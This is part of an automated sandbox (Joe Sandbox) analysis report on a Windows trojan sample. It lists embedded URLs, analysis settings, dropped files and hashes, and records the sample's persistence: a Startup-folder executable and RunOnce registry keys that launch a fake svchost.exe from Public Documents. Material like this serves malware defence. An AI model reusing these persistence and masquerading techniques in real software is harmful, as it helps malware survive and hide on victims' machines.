                            http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmpfalse
                              		high
                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                                		high
                                https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpfalse
                                    		high
                                    https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpfalse
                                      		high
                                      https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 00000010.00000002.331459917.00000188CA242000.00000004.00000001.sdmpfalse
                                        		high
                                        https://sectigo.com/CPS0CRYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://sectigo.com/CPS0DRYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.bingmapsportal.comsvsvchost.exe, 00000010.00000002.331248792.00000188CA213000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.nirsoft.net/AdvancedRun.exe, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmpfalse
                                              		high
                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpfalse
                                                		high
                                                https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://sectigo.com/CPS0RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 00000010.00000003.328602178.00000188CA245000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#RYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sRYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 00000010.00000002.331451640.00000188CA23D000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://%s.xboxlive.comsvchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		low
                                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tRYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yRYhdmjjr94.exe, 00000000.00000003.330692713.00000000064DA000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://dynamic.tsvchost.exe, 00000010.00000002.332002756.00000188CA265000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://crl.sectigo.com/SectigoPubRYhdmjjr94.exe, 00000000.00000000.413713809.00000000064C6000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000010.00000003.298107619.00000188CA230000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://activity.windows.comsvchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000010.00000003.324967731.00000188CA262000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 0000000A.00000002.590934523.00000217B1243000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		low
                                                                                  https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000010.00000002.331472512.00000188CA24B000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000010.00000003.328215736.00000188CA249000.00000004.00000001.sdmpfalse
                                                                                      		high

                                                                                      Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public

                                                                                      IPDomainCountryFlagASNASN NameMalicious

                                                                                      Private

                                                                                      IP
                                                                                      192.168.2.1
                                                                                      127.0.0.1

                                                                                      General Information

                                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                                      Analysis ID:483549
                                                                                      Start date:15.09.2021
                                                                                      Start time:08:52:10
                                                                                      Joe Sandbox Product:CloudBasic
                                                                                      Overall analysis duration:0h 14m 56s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:light
                                                                                      Sample file name:RYhdmjjr94 (renamed file extension from none to exe)
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                      Number of analysed new started processes analysed:87
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • HDC enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.adwa.expl.evad.winEXE@122/68@0/2
                                                                                      EGA Information:Failed
                                                                                      HDC Information:
                                                                                      • Successful, ratio: 100% (good quality ratio 95.8%)
                                                                                      • Quality average: 83%
                                                                                      • Quality standard deviation: 25.9%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 66%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 0
                                                                                      Cookbook Comments:
                                                                                      • Adjust boot time
                                                                                      • Enable AMSI
                                                                                      Warnings:
                                                                                      Show All
                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 23.55.161.144, 23.55.161.150, 23.55.161.143, 23.55.161.149, 23.55.161.142, 23.55.161.147, 23.55.161.152, 23.55.161.148, 23.55.161.146, 20.82.210.154, 20.42.73.29, 52.182.143.212, 20.189.173.22
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, wu-shim.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      08:53:15API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                      08:53:33API Interceptor317x Sleep call for process: powershell.exe modified
                                                                                      08:53:38AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe
                                                                                      08:53:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71 C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      08:54:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce 36C95A71 C:\Users\Public\Documents\2FDD6624\svchost.exe
                                                                                      08:54:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                      08:55:07API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      No context

                                                                                      Domains

                                                                                      No context

                                                                                      ASN

                                                                                      No context

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4096
                                                                                      Entropy (8bit):0.5955327958478372
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:bYtek1GaD0JOCEfMuaaD0JOCEfMKQmDIS/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bINGaD0JcaaD0JwQQZtAg/0bjSQJ
                                                                                      MD5:93A41A680641FAE8774E80C3A4D5030D
                                                                                      SHA1:28B20B57746D3C6203DA181122A8CE63552CED27
                                                                                      SHA-256:1C911D9ECF47823023932EE98BC8F5CF9D338F7D2CE3C6C530D2127E0BE6C204
                                                                                      SHA-512:BF98848C7F649DFD7E598F717D65C1188741B371D447F94038E90462AFD9A9F7422F9D6E7E4AC7C14F5E721416A0E0D444F5B5B9A9F3585D3587E0CC83D84E25
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ....E..h..(......5...y[.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................5...y[...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbb689bbd, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):32768
                                                                                      Entropy (8bit):0.09626539073619653
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:K4zwl/+gqX7klXRIE11Y8TRXXnlI8KA4zwl/+gqX7klXRIE11Y8TRXXnlI8K:50+/glXO4blXlLKP0+/glXO4blXlLK
                                                                                      MD5:5C63BD7D668A7342CAB71709F2D7D62D
                                                                                      SHA1:C294BF0B2C31E6D88B9A242FB282998802F38748
                                                                                      SHA-256:C0FF6CAAE989920A2CD19A64B3E1E974BEB19F8022112B89219F701D9029CBAF
                                                                                      SHA-512:C135DB5B3C3CDD374811D694C2877CDD55652F6936A3CA659238FC08368C7A0F05D723D1FCD70D27912612BD588EE596996FC626B257A5AD93A6C4CFE3886F4E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: .h..... ................e.f.3...w........................&..........w...5...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................:'2..5...y.....................I.5...y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):8192
                                                                                      Entropy (8bit):0.11120274726775213
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:6V/TEvqQ8wl/bJdAtixbqi9cbAll:6QqQbt41A
                                                                                      MD5:3F9F494540C9DB73C7A33507125AFE83
                                                                                      SHA1:93C2620A4D372FA341B2ECE1A5C6990AF3262D03
                                                                                      SHA-256:43D582CE346697710D1BD21FF59CC446A58489DDBD3CCE6F40B48BC7F857CBDC
                                                                                      SHA-512:DD1853C9BCAE2B6FEA4FE5A69F2D546F609CB31DDD0CB278B16C8EA5E1E916680B3C0981D6B9E20EA952109D23EAFD50FE6D808F53AEDDDC037363E4B83C9570
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ..u......................................3...w...5...y.......w...............w.......w....:O.....w.....................I.5...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RYhdmjjr94.exe_89963238c73da7d78cda02a97e2a0a7dda8e9bf_d37fc9e5_188fe961\Report.wer
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):16058
                                                                                      Entropy (8bit):3.763304934441823
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:18JrD6YeGrHBUZMXCaKGgMWmjbO/u7s6S274It/A:6lujyBUZMXCaV3O/u7s6X4It/A
                                                                                      MD5:B4F344BE7B8F817756C93C4AC13EEC14
                                                                                      SHA1:A1E684E56118634EFBEA226585213407CDEF52E1
                                                                                      SHA-256:E1FDBEF3D95C9440A2402E484AA4A57D9447318D78AB0F1CB91FB56FA6104F89
                                                                                      SHA-512:0EEF0CC6FED1A766F79494FA76F29076C92CFCCA6AB2A99D4D8F2E6BF9A1B07A3E4FA9B15FA70DD44CFEF55DF9974E5647A2459F681B4F8370AE69D7BBCACF02
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.6.1.9.4.8.6.4.5.9.7.4.1.1.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.6.1.9.4.8.7.0.9.4.1.1.6.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.5.a.d.3.5.0.4.-.2.c.e.5.-.4.0.c.4.-.9.f.8.f.-.0.5.d.0.b.a.8.a.4.0.a.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.8.4.4.3.8.6.-.0.c.3.6.-.4.9.5.4.-.a.4.4.0.-.2.6.a.2.3.1.3.a.3.b.4.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.Y.h.d.m.j.j.r.9.4...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.i.c.r.o.s.o.f.t...P.y.t.h.o.n.T.o.o.l.s...I.r.o.n.P.y.t.h.o.n...d.l.l.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.0.e.8.-.0.0.0.1.-.0.0.1.6.-.2.5.c.3.-.4.b.c.9.4.9.a.a.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.7.a.e.1.7.2.6.4.3.b.6.7.1.0.5.2.f.c.b.b.2.4.1.1.1.7.8.e.5.a.0.0.0.0.0.0.0.0.!.0.0.0.0.1.f.b.6.1.a.1.d.f.5.0.0.
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERC994.tmp.dmp
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Sep 15 15:54:26 2021, 0x1205a4 type
                                                                                      Category:dropped
                                                                                      Size (bytes):294077
                                                                                      Entropy (8bit):3.780938363510606
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:Lkz94lh0Tjd+p6uDowdiK0yiUCgU5HaK9gIOgF56GmCWejQoPK5I:Oelh0MpXD37oTjP9RpD2CjQU
                                                                                      MD5:B174EF5DB845E1D19D5C7ACAD1A79C7A
                                                                                      SHA1:0905EF50B7644EE721FABD5B4A9EC53BD2691A06
                                                                                      SHA-256:5848BC5857635E5BD58E50CB0E9A5CC3ECC911A4BCB420FFF7F94C06E78BE3C6
                                                                                      SHA-512:32B164219C50EEC023E5EC3CABEE1D158FCE6275456E8B835485256BAA53709660E75EDB8873177614C3B3A1EE408E5A1C593D64536A130760156D473BF36DED
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: MDMP....... .......2.Ba...................U...........B......|*......GenuineIntelW...........T.............Ba.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD83B.tmp.WERInternalMetadata.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):8412
                                                                                      Entropy (8bit):3.698431696336261
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:Rrl7r3GLNiZE6z6YInSUiSxtgmfZOS4Cprc89bBSsfRLm:RrlsNiq6z6YYSUptgmf8SJBRfg
                                                                                      MD5:24BEB6508039A7B946D1AD8C1C3E4753
                                                                                      SHA1:3581E2B1229F02290C83B4771C4DE78B854E378D
                                                                                      SHA-256:7A0948BF3E58DF0ABA02A570D6EF66139ECD415E7918E5F354931354811589D7
                                                                                      SHA-512:B1F82EA25D402F1B3676A467CB48BD1DF211829989AE84255B2AEDC2D77241189830E875913DEEF8BAB1443ABD518A956569881FDB4891F5ABF4EEE629BA3144
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.2.8.<./.P.i.d.>.......
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD994.tmp.xml
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4782
                                                                                      Entropy (8bit):4.488609851145929
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:cvIwSD8zsaCJgtWI97k8hWSC8Bu8fm8M4JetN1FTU+q8vvtN2fImGvHbA7KRd:uITfaQekHSN5JetZUKvtwgBv7AKd
                                                                                      MD5:5A1025751ACE3F849799494DC0542121
                                                                                      SHA1:9720F8283F299D63DB812BC21CD2D23AB05CC450
                                                                                      SHA-256:F9EA917400E83B530C0ACB74BE5D0ADA7910D3E4DBBC5B2B96B09BD31D860232
                                                                                      SHA-512:FEDE78E049BE9BC9D035C03E13C2728202F4784B4AD05F13C5863D6E4193AFA94F8EBAFDE9502295B9C3BD2BC666639B28FAACBAD8D9B81EC291953ABDCC5D33
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1167905" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD9B1.tmp.csv
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):55526
                                                                                      Entropy (8bit):3.048622853175057
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:2MHSdNPEnyHGgl522jkAeXvEZTDJ9V0X1JqPIKfS1MQj:2MHSdky3D224AeXvEZTDJ9yX1JUBWMQj
                                                                                      MD5:B8443AFCA826FE6F87455104002BB20A
                                                                                      SHA1:FE2D9FDD5FDACA132B7491529D7F9AE6FF0FFB72
                                                                                      SHA-256:467016D0B35E08DC43C13C68B59AF68A0E60F17BB9C23E26B13FF554CDBB7B34
                                                                                      SHA-512:9104B692D15DEEFA0719902B5B00FDD3111484FB2C280CD50219B9C4C4057D4716F2FE373ACB95FB1D57C5B2F73E0BF0496BBE3B0669968E1EB906701E56C9B3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
